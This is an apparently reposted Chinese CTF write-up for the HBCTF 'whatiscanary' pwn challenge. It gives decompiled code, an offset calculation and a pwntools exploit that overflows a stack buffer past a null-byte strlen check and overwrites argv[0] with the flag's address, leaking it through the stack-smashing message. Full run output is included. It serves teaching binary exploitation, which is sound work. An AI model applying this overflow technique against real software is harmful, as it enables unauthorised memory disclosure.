HBCTF whatiscanary
HBCTF whatiscanary
用户1423082
发布于 2024-12-31 18:19:34
发布于 2024-12-31 18:19:34
代码可运行
运行总次数:0
代码可运行
开始做之前不知道是简单题,因为没看wp,既然做了,就发出来吧
exp之前
NX + CANARY
CANARY很多时候直接覆盖argv即可
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partialmain函数,两个函数,一个读取flag文件到bss全局变量上,另一个是漏洞函数
int __cdecl main()
{
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
puts("hello, welcome to HBCTF!");
openFlag(&unk_804A0A0);
vuln();
puts("exit");
return 0;
}漏洞函数,name存在溢出,不过有strlen检测,这个00截断,很容易绕过
int vuln()
{
char name; // [sp+Ch] [bp-2Ch]@1
int v2; // [sp+2Ch] [bp-Ch]@1
v2 = *MK_FP(__GS__, 20);
printf("input your name(length < 10):");
sub_804878A(&name);
if ( (signed int)strlen(&name) > 10 )
{
puts("error, will exit!");
exit(0);
}
printf("hello, '%s', wish you have a good result!\n", &name);
return *MK_FP(__GS__, 20) ^ v2;
}开始
本地测试先生成flag文件
echo "flag{whatiscanary}" > flag我们运行起来看看,看看flag是不是在那
gdb-peda$ x /s 0x804A0A0
0x804a0a0: "flag{whatiscana"...由于canary会输出argv中的程序名,那么这题覆盖argv为flag地址即可
偏移计算
char name; // [sp+Ch] [bp-2Ch]@1python手算
>>> 0x2c
44
>>> 44+4
48其中4为ebp占用4字节
所以最终payload
# -*- coding: utf-8 -*-
from pwn import *
p = process('./whatiscanary')
p.recvuntil("hello, welcome to HBCTF!\n")
p.recvuntil("input your name(length < 10):")
flag_addr = 0x804A0A0
payload = "aaaa\x00"
payload += "a" * (48 - len(payload))
payload += p32(flag_addr) * 100
p.sendline(payload)
p.interactive()结果:
root@kali:~/learn/pwn/HBCTFwhatiscanary# python exp.py
[+] Starting local process './whatiscanary': pid 22162
[*] Switching to interactive mode
hello, 'aaaa', wish you have a good result!
*** stack smashing detected ***: flag{whatiscanary}
terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x698aa)[0xf76398aa]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xf76cc9e7]
/lib/i386-linux-gnu/libc.so.6(+0xfc9a8)[0xf76cc9a8]
flag{whatiscanary}
[0x8048851]
flag{whatiscanary}
[0x804a0a0]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
08049000-0804a000 r--p 00000000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
0804a000-0804b000 rw-p 00001000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
09839000-0985a000 rw-p 00000000 00:00 0 [heap]
f75d0000-f7787000 r-xp 00000000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f7787000-f7788000 ---p 001b7000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f7788000-f778a000 r--p 001b7000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f778a000-f778b000 rw-p 001b9000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f778b000-f778e000 rw-p 00000000 00:00 0
f7793000-f77ae000 r-xp 00000000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77ae000-f77af000 r--p 0001a000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77af000-f77b0000 rw-p 0001b000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77b0000-f77b4000 rw-p 00000000 00:00 0
f77b4000-f77b6000 r--p 00000000 00:00 0 [vvar]
f77b6000-f77b8000 r-xp 00000000 00:00 0 [vdso]
f77b8000-f77db000 r-xp 00000000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
f77db000-f77dc000 r--p 00022000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
f77dc000-f77dd000 rw-p 00023000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
ff7f3000-ff814000 rw-p 00000000 00:00 0 [stack]
[*] Process './whatiscanary' stopped with exit code -6 (SIGABRT) (pid 22162)
[*] Got EOF while reading in interactive本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2017-12-11,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
